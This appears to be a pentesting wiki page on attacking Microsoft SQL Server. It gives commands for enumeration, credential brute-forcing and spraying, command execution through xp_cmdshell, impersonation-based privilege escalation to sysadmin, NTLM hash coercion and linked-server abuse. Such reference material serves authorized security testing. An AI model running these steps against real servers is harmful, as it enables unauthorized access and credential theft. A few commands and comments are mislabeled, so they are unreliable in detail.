MSSQL
Pentesting MSSQL - TCP Port 1433
Theory
Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. By default, it runs on port TCP 1433
Default MS-SQL System Tables:
master Database: Records all the system-level information for an instance of SQL Server.
msdb Database: Is used by SQL Server Agent for scheduling alerts and jobs.
model Database: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Databas: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.
Practice
Enumerate
Using nmap scripts, we can enumerate the version of the TNS-Listener
# Usefull Scipts
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>
# Run all Scripts
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Enumerate DB Objects
To enumerate Databases, Tables, Columns, Users, Permissions, refers to the following page
Enum DatabasesBrute Force Credentials
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful, you can block accounts if you fail login several times using an existing username.
Using NetExec, we may bruteforce MSSQL credentials.
# Bruteforce
nxc mssql <TARGET> -u <userfile> -p <passwordfile> --no-bruteforce
# Password-Spray
nxc mssql <TARGET> -u <userfile> -p <passwordfile> --no-bruteforce
Sign-in
Using mssqlclient from Impacket, we can login to an MSSQL instance.
#Classic login
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip>
#Use Windows Authentication (forces NTLM authentication)
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
#Use Kerberos
mssqlclient.py -k DC1.DOMAIN.LOCAL
Remote Code Execution
Tools like NetExec can be used to execute OS commands from MSSQL
# Execute commands using xp_cmdshell
netexec mssql <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD> -x "whoami"
Local Code Execution
To localy execute/read/write files on an MSSQL instance, see the following page:
Read/Write/ExecuteCoerced Auths (Stealing NTLM Hash)
On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.
Living off the landMSSQL Privilege Escalation
SQL Server has a special permission, named IMPERSONATE
, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
UNIX-Like
From an UNIX-Like host, using NetExec, we can enumerate for impersonation privileges and PrivEsc as follows
# Enumerate PrivEsc vectors
nxc mssql <TARGET> <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv
# Impersonate PrivEsc
nxc mssql <TARGET> <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv -o ACTION=privesc
# Rollback sysadmin privs
nxc mssql <TARGET> <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv -o ACTION=rollback
Windows
To enumerate users that you can impersonate, run the following queries
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
We may also use mssqlclient from Impacket to enumerate users that we can impersonate
SQL (dbo@ScrambleHR)> enum_impersonate
If you can impersonate a user, even if he isn't sysadmin, you should check if the user has access to other databases or linked servers.
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Note that once you are sysadmin you can impersonate any other one:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
Local Privilege Escalation
The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege. You probably will be able to escalate to Administrator or NT AUTHORITY\SYSTEM following this page:
Abusing TokensLinked SQL Servers Abuse
Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
From an UNIX-Like machine, we can enumerate Linked SQL Servers using MssqlClient.py or MSSqlPwner.
# mssqlclient.py
mssqlclient.py -port 1433 <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
SQL (dbo@master)> enum_links
# MSSqlPwner
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth get-link-server-list
Resources
Last updated
Was this helpful?